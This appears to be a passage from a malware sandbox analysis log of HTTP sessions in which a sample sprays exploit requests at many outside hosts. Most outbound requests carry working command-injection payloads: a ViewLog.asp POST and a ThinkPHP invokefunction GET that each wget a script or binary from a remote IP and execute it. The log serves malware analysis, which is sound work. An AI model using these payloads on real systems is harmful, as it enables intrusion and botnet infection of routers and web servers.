                                                        Apr 14, 2024 16:35:31.233364105 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:35:35.104742050 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:35:42.783749104 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:35:58.141550064 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:36:29.113243103 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        186192.168.2.233461031.200.118.1468080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:28.372790098 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        187192.168.2.233735062.49.169.128080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:29.001526117 CEST326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:35:29.304837942 CEST390INHTTP/1.1 400 Bad Request
                                                        Date: Sun, 14 Apr 2024 14:35:29 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 248
                                                        Connection: close
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 54 68 65 20 70 6c 61 69 6e 20 48 54 54 50 20 72 65 71 75 65 73 74 20 77 61 73 20 73 65 6e 74 20 74 6f 20 48 54 54 50 53 20 70 6f 72 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 63 65 6e 74 65 72 3e 54 68 65 20 70 6c 61 69 6e 20 48 54 54 50 20 72 65 71 75 65 73 74 20 77 61 73 20 73 65 6e 74 20 74 6f 20 48 54 54 50 53 20 70 6f 72 74 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>400 The plain HTTP request was sent to HTTPS port</title></head><body><center><h1>400 Bad Request</h1></center><center>The plain HTTP request was sent to HTTPS port</center><hr><center>nginx</center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        188192.168.2.235163462.34.72.698080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:29.003511906 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:35:32.033288956 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        189192.168.2.234808695.164.77.1918080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:29.220594883 CEST326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:35:29.507513046 CEST1260INHTTP/1.1 400 Bad Request
                                                        Server: squid/4.10
                                                        Mime-Version: 1.0
                                                        Date: Sun, 14 Apr 2024 14:35:29 GMT
                                                        Content-Type: text/html;charset=utf-8
                                                        Content-Length: 3543
                                                        X-Squid-Error: ERR_INVALID_URL 0
                                                        Vary: Accept-Language
                                                        Content-Language: en
                                                        X-Cache: MISS from localhost
                                                        X-Cache-Lookup: NONE from localhost:8080
                                                        Via: 1.1 localhost (squid/4.10)
                                                        Connection: close
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 31 39 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 20 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 30 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e 61 2c 20 73 61 6e 73
                                                        Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><meta type="copyright" content="Copyright (C) 1996-2019 The Squid Software Foundation and contributors"><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>ERROR: The requested URL could not be retrieved</title><style type="text/css">... /* * Copyright (C) 1996-2020 The Squid Software Foundation and contributors * * Squid software is distributed under GPLv2+ license and includes * contributions from numerous individuals and organizations. * Please see the COPYING and CONTRIBUTORS files for details. *//* Stylesheet for Squid Error pages Adapted from design by Free CSS Templates http://www.freecsstemplates.org Released for free under a Creative Commons Attribution 2.5 License*//* Page basics */* {font-family: verdana, sans


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        190192.168.2.234888685.187.1.1758080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:29.349399090 CEST326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:35:29.715100050 CEST140INHTTP/1.1 403 Forbidden
                                                        Content-Type: text/html;charset=UTF-8
                                                        Content-Length: 0
                                                        Connection: close
                                                        Cache-control: no-cache


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        191192.168.2.235472895.47.252.13780
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:29.737066984 CEST333OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        192192.168.2.234889485.187.1.1758080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:30.054663897 CEST140INHTTP/1.1 403 Forbidden
                                                        Content-Type: text/html;charset=UTF-8
                                                        Content-Length: 0
                                                        Connection: close
                                                        Cache-control: no-cache


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        193192.168.2.2355410112.121.166.21480
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:30.207247019 CEST333OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:35:31.008846045 CEST307INHTTP/1.1 400 Bad Request
                                                        Server: nginx
                                                        Date: Sun, 14 Apr 2024 14:35:30 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 150
                                                        Connection: close
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        194192.168.2.234133695.211.107.9180
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:30.375210047 CEST333OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:35:30.680672884 CEST463INHTTP/1.1 301 Moved Permanently
                                                        Date: Sun, 14 Apr 2024 14:33:51 GMT
                                                        Location: https://s10860969.dedi.leaseweb.net/index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp'
                                                        Connection: close
                                                        Content-Type: text/html
                                                        Content-Length: 56
                                                        Data Raw: 3c 48 54 4d 4c 3e 3c 42 4f 44 59 3e 3c 48 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 48 31 3e 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e
                                                        Data Ascii: <HTML><BODY><H1>301 Moved Permanently</H1></BODY></HTML>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        195192.168.2.234196695.131.50.3980
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:30.387978077 CEST333OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:35:30.698950052 CEST495INHTTP/1.1 400 Bad Request
                                                        Date: Sun, 14 Apr 2024 14:35:30 GMT
                                                        Server: Apache/2.4.41 (Ubuntu)
                                                        Content-Length: 301
                                                        Connection: close
                                                        Content-Type: text/html; charset=iso-8859-1
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 31 32 37 2e 30 2e 31 2e 31 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p><hr><address>Apache/2.4.41 (Ubuntu) Server at 127.0.1.1 Port 80</address></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        196192.168.2.233684695.107.162.11280
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:30.428936958 CEST333OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:35:30.778112888 CEST339INHTTP/1.0 400 Bad Request
                                                        Date: Sun, 14 Apr 2024 22:35:30 GMT
                                                        Server: Boa/0.94.14rc21
                                                        Accept-Ranges: bytes
                                                        Connection: close
                                                        Content-Type: text/html; charset=ISO-8859-1
                                                        Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 3e 3c 48 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 48 31 3e 0a 59 6f 75 72 20 63 6c 69 65 6e 74 20 68 61 73 20 69 73 73 75 65 64 20 61 20 6d 61 6c 66 6f 72 6d 65 64 20 6f 72 20 69 6c 6c 65 67 61 6c 20 72 65 71 75 65 73 74 2e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                        Data Ascii: <HTML><HEAD><TITLE>400 Bad Request</TITLE></HEAD><BODY><H1>400 Bad Request</H1>Your client has issued a malformed or illegal request.</BODY></HTML>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        197192.168.2.234092295.0.6.17580
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:30.551893950 CEST333OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:35:32.321116924 CEST333OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:35:34.592832088 CEST333OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:35:38.944224119 CEST333OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:35:47.391081095 CEST333OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:36:04.540822983 CEST333OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:36:39.351952076 CEST333OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        198192.168.2.234266695.86.120.2580
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:30.555525064 CEST321OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        199192.168.2.234283495.56.124.14980
                                                        TimestampBytes transferredDirectionData
